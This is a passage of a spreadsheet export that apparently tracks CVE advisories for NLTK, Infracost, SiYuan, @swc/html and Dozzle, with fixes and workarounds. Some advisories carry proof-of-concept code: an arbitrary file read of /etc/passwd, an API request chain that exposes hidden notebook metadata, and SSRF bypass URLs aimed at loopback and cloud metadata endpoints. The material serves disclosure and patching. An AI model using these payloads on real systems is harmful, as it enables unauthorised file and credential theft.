t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63312</t></is></c></row><row r="1578"><c r="A1578" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1578" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1578" s="5" t="inlineStr"><is><t>CVE-2026-65915</t></is></c><c r="D1578" s="5" t="inlineStr" /><c r="E1578" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1578" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1578" s="5" t="inlineStr" /><c r="H1578" s="5" t="n"><v>0.004</v></c><c r="I1578" s="5" t="inlineStr" /><c r="J1578" s="5" t="inlineStr" /><c r="K1578" s="5" t="inlineStr" /><c r="L1578" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1578" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1578" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1578" s="5" t="inlineStr" /><c r="R1578" s="5" t="inlineStr" /><c r="S1578" s="5" t="inlineStr"><is><t>### Summary

There's a logic bug in `FileSystemPathPointer.open()` inside `nltk/data.py`
that makes the sandbox check permanently inert. The guard condition is always
`False` — meaning any file the process can read is accessible by passing a
`file://` URL to `nltk.data.load()`.

---

### Details

In `nltk/data.py`, `FileSystemPathPointer.open()` was patched at some point
with a comment saying "SECURITY PATCH ENFORCING SANDBOX", but the check
doesn't work:
```python
def open(self, encoding=None):
    path = os.path.normpath(self._path)

    # Block raw absolute reads such as "/" "C:\\Windows" etc.
    if os.path.isabs(path) and path != os.path.normpath(self._path):
        raise ValueError(f"Direct absolute file access blocked: {path}")

    stream = open(self._path, "rb")
```

`path` is set to `os.path.normpath(self._path)` on line 1, then compared
against `os.path.normpath(self._path)` again in the condition. They are
always equal. The `ValueError` never fires.

On top of that, `__init__` already calls `os.path.abspath()` before storing
`self._path`, so it's normalized before `open()` is even called. Running
`normpath` on it again changes nothing.

The `stream = open(self._path, "rb")` line is always reached regardless of
what path was passed in.

---

### PoC

Tested on Python 3.11, NLTK 3.9.1, Ubuntu 22.04.
```python
import nltk
from nltk.data import FileSystemPathPointer

# direct construction
ptr = FileSystemPathPointer("/etc/passwd")
with ptr.open() as f:
    print(f.read(300))

# via load() using file:// URL
data = nltk.data.load("file:///etc/passwd", format="raw")
print(data[:300])
```

Both print file contents. No exception is raised.

---

### Impact

Any app that lets users influence the string passed to `nltk.data.load()` or
`nltk.data.find()` is exposed — web APIs, notebook servers, multi-tenant
pipelines. An attacker can read any file the process user has access to:
`/etc/passwd`, `.env` files, private keys, `~/.aws/credentials`, etc.

## Suggested Fix

**File:** `nltk/data.py` — `FileSystemPathPointer.open()` (lines 378–390)

### What's wrong

Line 387 compares `normpath(self._path)` against itself — always equal,
so the `ValueError` never fires. The check is dead code.
`__init__` already calls `abspath()` on construction, so re-running
`normpath` inside `open()` changes nothing either.

---

### Fix

Validate against the actual list of permitted data directories instead:
```python
def open(self, encoding=None):
    import nltk.data as _d
    allowed = [os.path.abspath(p) for p in _d.path if p]
    if allowed and not any(
        os.path.commonpath([self._path, r]) == r for r in allowed
    ):
        raise ValueError(
            f"Access outside nltk_data blocked: {self._path!r}"
        )
    stream = open(self._path, "rb")
    if encoding is not None:
        stream = SeekableUnicodeStreamReader(stream, encoding)
    return stream
```

---

### Why `commonpath` not `startswith`

`startswith` is bypassable by a path that shares a prefix:
```
/tmp/nltk_data_evil".startswith("/tmp/nltk_data") → True  ✗
commonpath(["/tmp/nltk_data_evil", "/tmp/nltk_data"]) → "/tmp"  ✓
```

---

### Diff
```diff
-    path = os.path.normpath(self._path)
-    if os.path.isabs(path) and path != os.path.normpath(self._path):
-        raise ValueError(f"Direct absolute file access blocked: {path}")
-
+    import nltk.data as _d
+    allowed = [os.path.abspath(p) for p in _d.path if p]
+    if allowed and not any(
+        os.path.commonpath([self._path, r]) == r for r in allowed
+    ):
+        raise ValueError(f"Access outside nltk_data blocked: {self._path!r}")
     stream = open(self._path, "rb")
```</t></is></c><c r="T1578" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65915</t></is></c></row><row r="1579"><c r="A1579" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1579" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1579" s="5" t="inlineStr"><is><t>CVE-2026-69222</t></is></c><c r="D1579" s="5" t="inlineStr" /><c r="E1579" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1579" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1579" s="5" t="inlineStr" /><c r="H1579" s="5" t="n"><v>0.004</v></c><c r="I1579" s="5" t="inlineStr" /><c r="J1579" s="5" t="inlineStr" /><c r="K1579" s="5" t="inlineStr" /><c r="L1579" s="5" t="inlineStr"><is><t>npm:liquidjs</t></is></c><c r="M1579" s="5" t="inlineStr"><is><t>10.27.2</t></is></c><c r="N1579" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1579" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1579" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1579" s="5" t="inlineStr" /><c r="R1579" s="5" t="inlineStr" /><c r="S1579" s="5" t="inlineStr"><is><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is></c><c r="T1579" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t></is></c></row><row r="1580"><c r="A1580" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1580" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1580" s="5" t="inlineStr"><is><t>CVE-2026-70613</t></is></c><c r="D1580" s="5" t="inlineStr" /><c r="E1580" s="5" t="inlineStr" /><c r="F1580" s="5" t="inlineStr" /><c r="G1580" s="5" t="inlineStr" /><c r="H1580" s="5" t="inlineStr" /><c r="I1580" s="5" t="inlineStr" /><c r="J1580" s="5" t="inlineStr" /><c r="K1580" s="5" t="inlineStr" /><c r="L1580" s="5" t="inlineStr" /><c r="M1580" s="5" t="inlineStr" /><c r="N1580" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1580" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1580" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1580" s="5" t="inlineStr" /><c r="R1580" s="5" t="inlineStr" /><c r="S1580" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1580" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70613</t></is></c></row><row r="1581"><c r="A1581" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1581" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1581" s="5" t="inlineStr"><is><t>CVE-2026-70614</t></is></c><c r="D1581" s="5" t="inlineStr" /><c r="E1581" s="5" t="inlineStr" /><c r="F1581" s="5" t="inlineStr" /><c r="G1581" s="5" t="inlineStr" /><c r="H1581" s="5" t="inlineStr" /><c r="I1581" s="5" t="inlineStr" /><c r="J1581" s="5" t="inlineStr" /><c r="K1581" s="5" t="inlineStr" /><c r="L1581" s="5" t="inlineStr" /><c r="M1581" s="5" t="inlineStr" /><c r="N1581" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1581" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1581" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1581" s="5" t="inlineStr" /><c r="R1581" s="5" t="inlineStr" /><c r="S1581" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1581" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70614</t></is></c></row><row r="1582"><c r="A1582" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1582" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1582" s="5" t="inlineStr"><is><t>CVE-2026-70626</t></is></c><c r="D1582" s="5" t="inlineStr" /><c r="E1582" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1582" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1582" s="5" t="inlineStr" /><c r="H1582" s="5" t="n"><v>0.002</v></c><c r="I1582" s="5" t="inlineStr" /><c r="J1582" s="5" t="inlineStr" /><c r="K1582" s="5" t="inlineStr" /><c r="L1582" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1582" s="5" t="inlineStr"><is><t>3.9.4</t></is></c><c r="N1582" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1582" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1582" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1582" s="5" t="inlineStr" /><c r="R1582" s="5" t="inlineStr" /><c r="S1582" s="5" t="inlineStr"><is><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is></c><c r="T1582" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70626</t></is></c></row><row r="1583"><c r="A1583" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1583" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1583" s="5" t="inlineStr"><is><t>CVE-2026-71493</t></is></c><c r="D1583" s="5" t="inlineStr" /><c r="E1583" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1583" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1583" s="5" t="inlineStr" /><c r="H1583" s="5" t="n"><v>0.004</v></c><c r="I1583" s="5" t="inlineStr" /><c r="J1583" s="5" t="inlineStr" /><c r="K1583" s="5" t="inlineStr" /><c r="L1583" s="5" t="inlineStr"><is><t>Go:github.com/infracost/infracost</t></is></c><c r="M1583" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N1583" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1583" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1583" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1583" s="5" t="inlineStr" /><c r="R1583" s="5" t="inlineStr" /><c r="S1583" s="5" t="inlineStr"><is><t>### Impact

Path traversal via link following in the Infracost config-template parser. The `readFile`, `pathExists`, `isDir`, and `matchPaths` template functions confined repo-supplied paths with a lexical `filepath.Rel` check plus a leaf-only `os.Lstat`:

```
{{ readFile "evil/file" }}
```

With an intermediate directory symlink committed in the repo (`evil -&gt; /`), the path is lexically clean and the leaf is a regular file, so both checks pass, but `os.ReadFile` follows the symlink and reads outside the checkout. The contents are rendered into the generated config and surfaced via the Infracost dashboard and PR comment, so anyone who can open a pull request can read files off the runner.

Affects `infracost` up to and including `v0.10.44`. Successful exploitation reads any file the CLI process can reach on the runner. Impact depends on what the run exposes: under `on: pull_request` (the configuration in Infracost's documentation) fork pull requests run without secrets and with a read-only token, so exposure is limited. If Infracost runs under `pull_request_target`, or is triggered by a same-repository pull request, the read reaches the repository's secrets, enabling secret theft. The patch confines all four functions regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3586](https://github.com/infracost/infracost/pull/3586)) by routing all four functions through `security.IsPathAllowed`, which resolves symlinks anywhere in the path before a segment-aware containment check. The same fix landed in [config#14](https://github.com/infracost/config/pull/14) and [parser#144](https://github.com/infracost/parser/pull/144).
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: run Infracost under `on: pull_request` rather than `pull_request_target`, and keep fork pull requests from receiving secrets (the defaults).</t></is></c><c r="T1583" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71493</t></is></c></row><row r="1584"><c r="A1584" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1584" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1584" s="5" t="inlineStr"><is><t>CVE-2026-71494</t></is></c><c r="D1584" s="5" t="inlineStr" /><c r="E1584" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1584" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1584" s="5" t="inlineStr" /><c r="H1584" s="5" t="n"><v>0.004</v></c><c r="I1584" s="5" t="inlineStr" /><c r="J1584" s="5" t="inlineStr" /><c r="K1584" s="5" t="inlineStr" /><c r="L1584" s="5" t="inlineStr"><is><t>Go:github.com/infracost/infracost</t></is></c><c r="M1584" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N1584" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1584" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1584" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1584" s="5" t="inlineStr" /><c r="R1584" s="5" t="inlineStr" /><c r="S1584" s="5" t="inlineStr"><is><t>### Impact

Sensitive information exposure in the Infracost Terraform Cloud/Enterprise integration. Several code paths attached a configured secret token to a request whose host was taken straight from the scanned Terraform, with no check that the host was the trusted endpoint. 

The condition that matters is whether a Terraform Cloud/Enterprise (or registry) token is present in the run: if one is, the injected hostname can disclose it. Impact therefore depends on the trigger. Under `on: pull_request` (the only configuration in Infracost's documentation) fork pull requests run without secrets, so no token is present. It only reaches token disclosure under `pull_request_target`, a same-repository pull request, or another CI setup that provides the token alongside untrusted Terraform, and exploiting an untrusted fork pull request also typically needs a maintainer to approve the workflow run. The patch scopes the token to the trusted host regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3590](https://github.com/infracost/infracost/pull/3590)) by attaching a token only when the destination host matches the configured trusted host; otherwise Infracost refuses to send it and skips remote variable loading
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: use `on: pull_request` rather than `pull_request_target`, pin `organization`, `workspace`, and `host` in Infracost config so the `.tf` hostname is ignored, and keep Terraform Cloud and registry tokens out of runs that process untrusted pull request content.</t></is></c><c r="T1584" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71494</t></is></c></row><row r="1585"><c r="A1585" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1585" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1585" s="5" t="inlineStr"><is><t>CVE-2026-72789</t></is></c><c r="D1585" s="5" t="inlineStr" /><c r="E1585" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1585" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1585" s="5" t="inlineStr" /><c r="H1585" s="5" t="n"><v>0.003</v></c><c r="I1585" s="5" t="inlineStr" /><c r="J1585" s="5" t="inlineStr" /><c r="K1585" s="5" t="inlineStr" /><c r="L1585" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M1585" s="5" t="inlineStr"><is><t>0.0.0-20260726020813-a25c2dd06aae</t></is></c><c r="N1585" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1585" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1585" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1585" s="5" t="inlineStr" /><c r="R1585" s="5" t="inlineStr" /><c r="S1585" s="5" t="inlineStr"><is><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is></c><c r="T1585" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72789</t></is></c></row><row r="1586"><c r="A1586" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1586" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1586" s="5" t="inlineStr"><is><t>CVE-2026-72790</t></is></c><c r="D1586" s="5" t="inlineStr" /><c r="E1586" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1586" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1586" s="5" t="inlineStr" /><c r="H1586" s="5" t="n"><v>0.002</v></c><c r="I1586" s="5" t="inlineStr" /><c r="J1586" s="5" t="inlineStr" /><c r="K1586" s="5" t="inlineStr" /><c r="L1586" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M1586" s="5" t="inlineStr"><is><t>0.0.0-20260726005141-9edb321eb451</t></is></c><c r="N1586" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1586" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1586" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1586" s="5" t="inlineStr" /><c r="R1586" s="5" t="inlineStr" /><c r="S1586" s="5" t="inlineStr"><is><t>**CVE:** This vulnerability corresponds to [CVE-2026-72790](https://nvd.nist.gov/vuln/detail/CVE-2026-72790).

### Relationship to GHSA-8x84-r2ff-h8pq (please read first)

`getNotebookInfo` is named in the earlier advisory GHSA-8x84-r2ff-h8pq, in its remediation section, which asked for reader filtering on both `getNotebookConf` and `getNotebookInfo`. Commit `3bc014c7d` applied that filtering to `getNotebookConf` only.

That advisory grouped `getNotebookInfo` under `BoxCrypt`, and `getNotebookInfo` never returns `BoxCrypt`. Anyone checking the handler for key material would correctly find none and move on. This report corrects that characterisation and states what the handler actually discloses, which is notebook metadata rather than key material. If you would prefer this tracked as a follow-up on the original advisory rather than separately, that is entirely reasonable.

### Summary

`/api/notebook/getNotebookInfo` is registered with `CheckAuth` only and applies no authorization check of any kind. Given a notebook identifier, it returns that notebook's author-written name, document count, total size and creation and modification timestamps. It does so for every notebook the server has loaded, including notebooks that `lsNotebooks` deliberately withholds from readers because they are closed or not publish-visible.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:123` `POST /api/notebook/getNotebookInfo` → `model.CheckAuth` → `getNotebookInfo` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. `IsReadOnlyRoleContext`, `publishAccess`, `Visible` and `Closed` all return zero matches |
| Exposed | `BoxInfo{ID, Name, DocCount, Size, HSize, Mtime, CTime, HMtime, HCtime}` |
| Affected refs | `eef105683` (v3.7.3, master HEAD) and `v3.7.4-alpha.1`, handler identical on both |

**The handler.** It validates `boxID` against the ID pattern, calls `box := model.Conf.Box(boxID)`, returns a not-found response if that is nil, and otherwise returns `box.GetInfo()` unmodified. `GetInfo()` (`kernel/model/box.go:470`) walks the notebook's files and returns the metadata listed above. There is no ownership check and no publish-access check anywhere on the path.

The nil branch is also a minor existence oracle: a valid-format identifier that names no loaded notebook is distinguishable from one that does.

**Guarded sibling.** `lsNotebooks`, the notebook lister, is also reader-reachable and does filter. For read-only roles it skips any notebook where `notebook.Closed` holds, and skips any notebook whose publish-access entry has `!item.Visible`. The codebase therefore intends closed and non-published notebooks to be invisible to readers. `getNotebookInfo` returns their name and statistics to any reader who supplies the identifier.

**Precedent.** GHSA-f2rw-w22v-54vh restricted `getEncryptedNotebookStatus`, which disclosed encrypted-notebook names and lock state, to administrators. `getNotebookInfo` is the non-encrypted analogue, disclosing regular notebook names and statistics including for notebooks outside the reader's publish scope, and was not restricted.

**Reachability, stated precisely, because it differs by branch.**

On v3.7.3 a reader can obtain the identifier of a notebook they cannot see, by chaining two endpoints that are currently ungated on that branch. `getBlockDefIDsByRefText` returns block and document identifiers workspace-wide, including from hidden notebooks. `getPathByID` then returns the owning notebook identifier for any such block, in its `notebook` field. `getFullHPathByID` additionally discloses the notebook name directly. The chain requires no special conditions beyond a reference text that occurs somewhere in the workspace.

On the development branch those sources are already closed. `getPathByID` now gates through `CheckBlockIdMetadataAccessableByPublishAccessInBox`, `getIDsByHPath` through `filterFileTreeBlockIDsByPublishDiscoverability`, and `getBlockDefIDsByRefText` and `getFullHPathByID` are likewise gated. Notebook identifiers are a fourteen-digit timestamp plus seven random characters, and `Conf.Box(boxID)` returns non-nil only for loaded notebooks, so guessing is not practical. A reader-reachable route on the development branch that yields the identifier of a hidden notebook was not found.

So on the development branch this is defence in depth rather than a live path. It is reported because the handler itself remains unguarded on both branches, and because closing it removes any dependence on those identifier sources staying gated in future.

### Proof of Concept

Precondition: publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A notebook that is closed or not publish-visible. Steps 1 and 2 apply to v3.7.3; on the development branch, start at step 3 with a known identifier.

Step 1, obtain block identifiers workspace-wide:

```
POST http://127.0.0.1:6808/api/block/getBlockDefIDsByRefText
{"anchor":"&lt;a word likely to occur anywhere in the workspace&gt;"}

→ 200, block and document identifiers including ones inside hidden notebooks
```

Step 2, resolve one to its owning notebook:

```
POST http://127.0.0.1:6808/api/filetree/getPathByID
{"id":"&lt;identifier from step 1&gt;"}

→ 200, the notebook field carries the hidden notebook's boxID
```

Step 3, read the notebook's metadata:

```
POST http://127.0.0.1:6808/api/notebook/getNotebookInfo
{"notebook":"&lt;boxID from step 2&gt;"}

→ 200, returns name, docCount, size, hSize, mtime, ctime, hMtime, hCtime
   for a notebook that lsNotebooks does not return to this same session
```

The differential is the point: call `lsNotebooks` with the same session and confirm the notebook is absent from the list, then call `getNotebookInfo` and receive its name and statistics.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can read the author-written name, document count, total size and activity timestamps of notebooks that are closed or not published, which are exactly the notebooks the notebook lister withholds from them. Notebook names are free text chosen by the author and routinely describe their contents. Document count and size indicate scale, and the modification timestamp reveals recent activity in a workspace area the reader has no access to. Confidentiality only, with no integrity or availability impact, and no document content is disclosed.

### Suggested fix

Apply the same filtering `lsNotebooks` already performs. When `IsReadOnlyRoleContext(c)` holds, return the not-found response unless the notebook is publish-visible and not closed, before calling `GetInfo()`. This is the reader filtering the earlier advisory's remediation section requested for this handler.</t></is></c><c r="T1586" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72790</t></is></c></row><row r="1587"><c r="A1587" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1587" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1587" s="5" t="inlineStr"><is><t>CVE-2026-72925</t></is></c><c r="D1587" s="5" t="inlineStr" /><c r="E1587" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1587" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1587" s="5" t="inlineStr" /><c r="H1587" s="5" t="n"><v>0.002</v></c><c r="I1587" s="5" t="inlineStr" /><c r="J1587" s="5" t="inlineStr" /><c r="K1587" s="5" t="inlineStr" /><c r="L1587" s="5" t="inlineStr"><is><t>crates.io:swc_html_minifier, npm:@swc/html</t></is></c><c r="M1587" s="5" t="inlineStr"><is><t>1.15.47-nightly-20260729.1, 59.0.0</t></is></c><c r="N1587" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1587" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1587" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1587" s="5" t="inlineStr" /><c r="R1587" s="5" t="inlineStr" /><c r="S1587" s="5" t="inlineStr"><is><t>## Impact

`@swc/html` minifies JSON contained in `script` elements such as
`application/json` and `application/ld+json` by parsing and serializing the
JSON value.

Before the patched versions, JSON serialization could convert escaped
less-than signs such as `\u003C` into literal `&lt;` characters. If the JSON
contained an escaped `&lt;/script&gt;` sequence, the generated HTML could terminate
the containing script element early because HTML tokenization occurs before
the JSON is consumed.

Applications that minify HTML containing attacker-controlled JSON data could
therefore transform inert data into active markup. A crafted payload could
execute script in the origin of the generated page.

## Patches

The issue is fixed in:

- `@swc/html` 1.15.47
- `swc_html_minifier` 59.0.0

The minifier now re-escapes less-than signs after JSON serialization, preserving
the script element boundary.

## Workarounds

Users who cannot upgrade can disable JSON minification with:

```js
await minify(html, {
  minifyJson: false,
});</t></is></c><c r="T1587" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72925</t></is></c></row><row r="1588"><c r="A1588" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1588" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1588" s="5" t="inlineStr"><is><t>CVE-2026-73087</t></is></c><c r="D1588" s="5" t="inlineStr" /><c r="E1588" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1588" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1588" s="5" t="inlineStr" /><c r="H1588" s="5" t="n"><v>0.003</v></c><c r="I1588" s="5" t="inlineStr" /><c r="J1588" s="5" t="inlineStr" /><c r="K1588" s="5" t="inlineStr" /><c r="L1588" s="5" t="inlineStr"><is><t>Go:github.com/amir20/dozzle</t></is></c><c r="M1588" s="5" t="inlineStr"><is><t>1.29.1-0.20260804193351-8cf7ccd5ee04</t></is></c><c r="N1588" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1588" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1588" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1588" s="5" t="inlineStr" /><c r="R1588" s="5" t="inlineStr" /><c r="S1588" s="5" t="inlineStr"><is><t>## Summary

The `isBlockedIP` SSRF guard in Dozzle's webhook notification dispatcher blocks loopback, link-local, multicast, and unspecified addresses but does not recognize IPv6 transition mechanism addresses (RFC 3056 6to4, RFC 6052 NAT64, RFC 4380 Teredo) that embed arbitrary IPv4 addresses. An authenticated user can bypass the guard to reach loopback services, cloud metadata endpoints (169.254.169.254), and other blocked ranges via webhook notification URLs.

## Affected component / versions

- Package: `github.com/amir20/dozzle`
- Affected versions: all versions with SSRF guard (current HEAD [`b9df313`](https://github.com/amir20/dozzle/commit/b9df31356fc024e6768a1aac605844dc041d95ee))
- Vulnerable code: `internal/notification/dispatcher/webhook.go`

## Details

### Root cause (CWE-918)

[`internal/notification/dispatcher/webhook.go:32-51`](https://github.com/amir20/dozzle/blob/b9df31356fc024e6768a1aac605844dc041d95ee/internal/notification/dispatcher/webhook.go#L32-L51):

```go
func isBlockedIP(ip net.IP) bool {
	if ip.IsLoopback() ||
		ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() ||
		ip.IsMulticast() ||
		ip.IsInterfaceLocalMulticast() ||
		ip.IsUnspecified() {
		return true
	}
	if v4 := ip.To4(); v4 != nil &amp;&amp; zeroNetV4.Contains(v4) {
		return true
	}
	if ip.Equal(net.IPv4bcast) {
		return true
	}
	return false
}
```

The guard intentionally allows RFC 1918 private ranges for self-hosted webhook targets, but blocks loopback (127.0.0.0/8, ::1), link-local (169.254.0.0/16, fe80::/10), and other non-routable addresses. IPv6 transition mechanism addresses bypass all these checks:

| Mechanism | Prefix | Embeds | `isBlockedIP` result |
|-----------|--------|--------|---------------------|
| 6to4 | `2002::/16` | any IPv4 in bits 16-47 | `false` |
| NAT64 WKP | `64:ff9b::/96` | any IPv4 in bits 96-127 | `false` |
| Teredo | `2001:0000::/32` | any IPv4 in bits 96-127 | `false` |

### Reachability / trust boundary

The `safeDialContext` function (line 53) resolves hostnames and checks each IP against `isBlockedIP` before establishing a TCP connection. This is used as the `DialContext` for the webhook HTTP client (line 115).

Webhook URLs are configured by authenticated Dozzle users through the notification settings UI. The guard exists to prevent authenticated users from using webhook delivery as a proxy to reach the host machine's loopback services or cloud metadata endpoint.

### Attack chain

1. Authenticated user creates a webhook notification with URL `http://[2002:7f00:0001::1]:8080/` (6to4 embedding 127.0.0.1)
2. When a notification triggers, Dozzle's webhook dispatcher calls `safeDialContext`
3. The IPv6 address `2002:7f00:0001::1` is checked against `isBlockedIP` -- all predicates return false
4. Connection proceeds to the 6to4 relay which routes to 127.0.0.1
5. The webhook POST reaches the host's loopback services

## Impact

An authenticated user can bypass the SSRF guard to:

- Reach cloud metadata service at 169.254.169.254 via `2002:a9fe:a9fe::1` (6to4) to steal instance credentials
- Reach localhost services via `64:ff9b::7f00:1` (NAT64) or `2002:7f00:0001::1` (6to4)
- The webhook response body is logged at debug level but not returned to the user, making this a semi-blind SSRF (status code is returned)

Note: RFC 1918 private ranges are intentionally allowed by the guard. This bypass specifically targets the blocked ranges (loopback and link-local/metadata) that the guard explicitly intends to prevent.

## Proof of concept

Bypass vectors:

```
# 6to4 embedding 127.0.0.1 (bypasses IsLoopback)
http://[2002:7f00:0001::1]:8080/

# NAT64 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[64:ff9b::a9fe:a9fe]/latest/meta-data/

# 6to4 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[2002:a9fe:a9fe::1]/latest/meta-data/

# Teredo embedding 127.0.0.1
http://[2001:0000:dead:beef:0000:0000:7f00:0001]:8080/
```

Verification that `isBlockedIP` returns false for all vectors:

```go
package main

import (
    "fmt"
    "net"
)

func isBlockedIP(ip net.IP) bool {
    return ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() ||
        ip.IsMulticast() || ip.IsInterfaceLocalMulticast() || ip.IsUnspecified()
}

func main() {
    for _, v := range []string{
        "2002:7f00:0001::1",    // 6to4 -&gt; 127.0.0.1
        "64:ff9b::a9fe:a9fe",   // NAT64 -&gt; 169.254.169.254
        "2002:a9fe:a9fe::1",    // 6to4 -&gt; 169.254.169.254
    } {
        ip := net.ParseIP(v)
        fmt.Printf("%-35s blocked=%v\n", v, isBlockedIP(ip))
    }
}
// Output: all false
```

## Remediation

Add IPv6 transition mechanism prefix checks to `isBlockedIP`:

```go
func isBlockedIP(ip net.IP) bool {
